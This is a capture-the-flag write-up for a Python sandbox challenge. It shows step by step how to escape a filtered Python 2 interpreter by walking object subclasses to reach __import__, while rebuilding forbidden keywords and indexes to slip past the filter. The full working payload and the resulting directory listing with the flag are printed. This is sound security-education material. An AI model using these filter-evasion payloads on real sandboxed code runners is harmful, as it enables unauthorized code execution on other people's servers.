# Python Learning Environment

We get access to web-based, quite limited Python interpreter. For example, we can't use any built-in functions (e.g. `eval()` or `ord()`). Besides that, all occurences of `import`, `os`, `[`, `]` and all digits are simply removed before the code gets executed.

I found on Google that the following code can be used to import `os` and execute its method (e.g. `listdir()`):
```python
classes = {}.__class__.__base__.__subclasses__()
b = classes[59]()._module.__builtins__
m = b['__import__']('os')
print m.listdir(".")
```
There are, however, 4 problems: we can't use digits, `[`, `import` or `os`. But:
* Instead of writing `59`, we can use `'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.count('a');`.
* Instead of using `[]` to access array value, we can use `pop()` method.
* Instead of `import` and `os`, we can use the following code:
  ```python
  def rep(str,a,b):
    return str.replace(a,b)

  rep('xmport', 'x', 'i') # --> import
  rep('xs', 'x', 'o') # --> os
  ```
The final code, with the above changes, will be:
```python
def rep(str,a,b):
  return str.replace(a,b)

fiftynine='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.count('a');
classes = {}.__class__.__base__.__subclasses__()
b = classes.pop(fiftynine)()._module.__builtins__
m = b.pop(rep('__xmport__', 'x', 'i'))(rep('xs', 'x', 'o'))
print m.listdir(".")
```
Executing it gives the following results:
```
> ['app.pyc', 'templates', 'app.py', 'app.ini', 'app.conf', 'redeploy.sh', 'F#{PyTh0n_Pr1s0n_br3aK}', 'README.md', 'build-flask.sh', 'deployment.yml', 'requirements.txt', 'xpl.py', 'build-nginx.sh', 'static', 'Dockerfile-flask', 'Dockerfile-nginx', 'docker-compose.yml']
```
The flag is `F#{PyTh0n_Pr1s0n_br3aK}`.